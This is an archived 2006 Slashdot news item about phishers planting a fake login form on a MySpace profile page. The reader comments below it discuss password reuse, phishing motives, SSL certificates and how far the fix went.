Stories
Slash Boxes
Comments
Search

News for nerds, stuff that matters

Slashdot Log In

Log In

Create Account  |  Retrieve Password

MySpace Accounts Compromised By Phishers

Posted by kdawson on Sun Oct 29, 2006 01:20 PM
from the even-the-wary-beware dept.
Security The Internet
An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.
+ -
story
This discussion has been archived. No new comments can be posted.
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.

MySpace Accounts Compromised By Phishers 50 Comments More /

 Full
 Abbreviated
 Hidden
More
Loading... please wait.

  • Maybe I caused the slow discovery (Score:3, Interesting)

    by AVryhof (142320) <avryhof AT gawab DOT com> on Sunday October 29 2006, @02:02PM (#16634080) Homepage
    Maybe it's been my fault it's taken so long to "discover"

    I've been seeing 'em now and then and contacting the hosts where the scripts are hosted to get their accounts disabled.

    I'm not worried about being phished myself... I'm quite perceptive...but it's people I know who I'm worried about.

    • Re: (Score:2, Funny)

      by Anonymous Coward
      Yes, all the internets depend on you for security. Please, think of the children next time and stop reporting security holes.
    • "Dear diary... mood? Apathetic."
  • Widespread exploitation of myspace could cause up to $6 dollars in damages

  • Finally (Score:3, Funny)

    by 1310nm (687270) on Sunday October 29 2006, @02:09PM (#16634128)
    Keep up the good work, phishers!

    The secrets of apathetic teens will soon be aired for the world to view!

    • Not quite. (Score:1, Informative)

      by Anonymous Coward
      "Despite public perception, most MySpace users are over 35, according to a release today [05 Oct 2006] by ComScore. The stat-tracking company says that as MySpace continues to grow, its user base is skewing older - teens accounted for around 25% of users in August 2005, but now only represent 12% of the audience. Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year."

      http://www.comscore.com/press/release.asp?press=10 19 [comscore.com]
    • .. which seems to be the most popular with the angsty crowd. MySpace, on the other hand, is the single largest concentration of insanity, drama and nonsense ever, surpassing even LJ. I'm not kidding - just try browsing through some of the comments and profiles on MySpace and you'll lose all faith in humanity in the space of about five minutes.

  • You can view the horrible phishing status for free (Score:4, Interesting)

    by Anonymous Coward on Sunday October 29 2006, @02:13PM (#16634170)
    OpenDNS people started http://phishtank.com/ [phishtank.com] service which is completely community based, as you can actually see the phishes and verify them, I have seen some amazing stuff around. Compromised servers having SSL certificate which are abused in phishing operation, some pages having fake addressbar on top and most important of all, USA based banks are being phished from USA cable modem subscriber (haxored) and nothing done against it for days.

    BTW as it is free to use, SURBL added it, now the stuff which you verify actually helps to people using that free list.
  • MySpace is dying
  • As much as they will beat this feature to death over the next few months, it will only deter the least sophisticated methods. Most of which are already history.

    Meanwhile "web 2.0" applications will suffer phishing attacks anyway because the 2.0 complexity offers so many new ways to do bad things.

    Today myspace, tomorrow your web 2.0 bank? Google 2.0 application?

    I'm not saying progress is bad. But there's no penalty/liability for writing insecure web 2.0 apps.
    • If you're implying that MySpace is Web 2.0 I'd have to disagree. MySpace may be great for 'social networking', but from a technical point of view it's a nightmare. Malformed HTML, non-degradable Javascript, code injection issues... it's like a bad joke.
  • http://www.myspace.com/login_home_index_html [myspace.com]

    Seems Myspace has fixed it. Not that I really care, as I've never used it nor do I have any intention to.

    Next!?

    • Re: (Score:1, Insightful)

      by Anonymous Coward
      Seems Myspace has fixed it.

      No, they've deleted this one specific account - the vulnerability that allowed the phishers to insert a form (and the styling to remove the regular page content (which is a feature)) is almost certainly still there.

      Expect to see a large number of variations on this to show up in the next few days/weeks.

  • NOT on Myspace's MAIN PAGE (Score:5, Informative)

    by kihjin (866070) on Sunday October 29 2006, @02:24PM (#16634254)
    FTA:

    The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.

    Netcraft says this is still live on Myspace's main page. I've looked at the HTML source for both the main page, and that special login page you get when you try to access a portion of the site that requires you to log in. On both pages, I located the form element which controls the login. The method is POST, and the action redirects to a script under the "login.myspace.com" domain.

    So the summary and the article itself is slightly misleading (at first) by implying (perhaps unintentionally) that the phishing attempt is coming directly from Myspace's main page.
  • With MySpace being so popular and with its users regularly logging in on a daily basis, I wonder what the impact of this was in terms of:
    1) the total number of "phished" accounts
    2) the number of "phished" accounts in terms of a percentage of the total userbase.
    • Possible not many since less than one third of all my space accounts are active.
      • Really? Where did you get this information? I haven't seen this information published anywhere... but would love to see where this info comes from.
    • I used to host a free web hosting service. And as you can imagine it did attract some unsavoury characters - one of the accounts was used as a MySpace phishing account, it was only on-line for 1-2 days before I managed to catch and ban the account, but in this time it did manage to obtain details for over 2000 individual logins - whether or not all of these credentials worked or not I can't say for sure. I tried contacting MySpace offering over these credentials but I didn't receive an e-mail back.
  • MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?
    • You clearly didn't read the Washington Post article.

      The 16 years old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next mornign at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.

      That's why even a free MySpace is a good target. As a matter of fact, MySpace is an excellent target because it has highly loyal and extremely active users who log into MySpace multiple times a day. This means that if the phishers' crack stays
      • The 16 years old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next mornign at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.
        Ah yes but mom and dad would do so with a different account and password and home directory, right ?
        Huh ? Right ?

        Guys ?
        • Because they could edit MySpace pages to include code that does silent, drive-by malware installs on the machine of anyone that pulls up that page on an ill-maintained Windows box. Those machines would get pwned and could then have keyloggers installed on them to gather more useful info, or could be used to send spam, perform DoS attacks, etc.

          Yes, the phishers could create MySpace accounts/pages from scratch, but their work pays off much more quickly if they co-opt the pages of frequent users with large, we
    • MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

      People login to myspace with an email address and password.

      If a person used the same password for their email, then not only is their email comprimised, but via their email, the attacker gets a list of other potential sites to try.

      I would be extra suspicious of strange behaviour by ebay users for example. What is especially insidious about this is that once you've got someone's email account, you can run

    • MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

      There's actually a great interest in it. Because when you're an average user, unaware of that whole phishing thing, and that bulletins one of your favourite singers or friends say "~New Ring tones Adults can't hear! Download Today*", linking to a website to supposedly download them, you're much more likely to click, thinking it was advised to you by someone real (a "friend" or an artist you like), than when you

    • According to Tom [myspace.com] (the guy who runs Myspace, I think) spammers can use login credentials to send spam to friends of a user. There are also screenshots on Tom's blogpost - it seems the best workaround so far is instructing users to type myspace into the address bar themselves before logging in.
  • I clicked a myspace profile link in a friends bulletin which sent me to what I thought was the login page (I failed to check that hostname was indeed login.myspace.com) The login didn't appear to work and I attributed it to myspace being down at the time. It wasn't till later that I noticed I had posted a similar bulletin with a similar link (though that profile was already dead by the time I checked it). As far as I can tell the only thing they did was post a bulletin to try to get more accounts. I was abl
  • Another danger of getting username/password combinations is that so many people use the same username/password EVERYWHERE. Once a thief gets the username/password for ANY site, even a completely useless site with nothing of value, they could then do a systematic login attempt at all the common sites and banks where you might be able to do some real damage.
  • It's not these little phishing sites that scare me, it's the banking\credit union sites. For example, http://www.wamucards.com/ [wamucards.com] (DON'T ENTER YOUR INFO HERE!).

    How do sites like these get SSL from Verisign? How could that slip though? There was a recent /. Headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/204 6225 [slashdot.org] In cases like these, i guess it makes sense

    • Re: (Score:3, Insightful)

      by baadger (764884)

      How do sites like these get SSL from Verisign? How could that slip though? There was a recent /. Headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/204 [slashdot.org] 6225 In cases like these, i guess it makes sense

      When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.

      Besides, Verisig

    • Re: (Score:3, Interesting)

      by LO0G (606364)
      I'm confused. Here's the domain registration for wamucards.com:
      Registrant:
      Washington Mutual, Inc. (DOM-1398425)
      1201 3rd Ave Seattle WA 98101 US

      Domain Name: wamucards.com

      Registrar Name: Markmonitor.com
      Registrar Whois: whois.markmonitor.com
      Registrar Homepage: http://www.markmonitor.com/ [markmonitor.com]

      Administrative Contact:
  • This is really old news. Phishers have been around myspace for ever. They used to use embedded flash with action script to redirect and myspace upgraded to flash 9 which allows the server to restrict flash redirects ( a feature added at myspace's request). They mostly use the phished accounts for myspace spamming and botnet-worm distribution.
  • if people had just installed Firefox 2

  • My girlfriends account was compromised like this about a month ago. She tried telling me the Mac has a virus (really). I made her change her password and now I periodically do a "Reset Safari" on 'her' browser.

    I haven't noticed any strange posts by her or anything since the initial attack, so it seems it's a one time only type deal. Of course, a attack like this could be potentially worse, hell I wish it was worse. I wish it would have ruined her account and wouldn't let her create a new one.

    The des

  • I tried to visit www.myspace.com/login_home_index_html and it appears the account has been taken down.

    Either that, or, that's what these scammers want us to think?
  • Those who maybe wondering why Phishers used Myspace.

    1. It is a good way to get information about the user
    2. Good way to get information about the user's friends.
    3. How many pc illiterate often use same password for multiple accounts?

    I have already added the following line to my hosts files:

    216.178.32.51 greentea420.iespanna.es
  • Hay guyz i hav this gr8 idea i tink i shud take a pikkchur of myself in da mirrur holding teh camerah at a weiurd angle isnt that original guyz? Amirite?

    War is fun when you hate both sides.
  • (Generally young) people with no desire to gain any technical understand of securely maintaining responsibility over their own information use an (invariably) insecure operating system to access a web site designed specifically to make someone very rich by feeding advertisements at the same people in a way that makes them feel like "one of the pack" whilst divesting the site owners of any responsibility of that personal data by offering the service as "free".

      • Re: (Score:2, Informative)

        by drpimp (900837)
        No shit I just slapped myself after doing just that ... MOD ME DOWN and burn me at the stake!

    • Re: (Score:1, Funny)

      by Anonymous Coward
      Jep, the testosterone is definitely tumbling....

    • Security conscious people use MySpace? Who knew...

      There's even a Slashdot group [myspace.com] on it actually. And as security concious as I am, I didn't see what was wrong with the two first example screenshots on Tom's blog about phishing [myspace.com], I think that if I went through one of these fake login-page profiles I might have fell for it, just because I don't expect to get phishing from a page on the genuine site itselves. Lots of people in my MySpace friends fell for it, and almost half of the bulletins in my bulletins lis

      • Indeed, but the whole use of HTML/CSS is what draws a lot of kids (and some adults) to the site is to make it really their space. The numerous myspace profile HTML/CSS generators out there make it point and click for the regular user.

        I suppose they could avoid this problem in the future by stripping FORM tags from the editable parts of users profiles. That would keep this from happening again, but might break some really custom (not even recognisable) myspace pages.

    • When we first came across this information a few days ago, it was also linked to Mashable.com [mashable.com], which claims that up to 3,000 logins may have been compromised, and that they only recently became more successful in running the attack (having initially screwed up the inserted script). The other aspect is that Mashable appears to be talking about a slightly different phishing attack, which is still functional (using MySpace bulletins to spam other users).

      Filtering based on blacklists (as you are suggesting M

All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest © 1997-2009 Geeknet, Inc.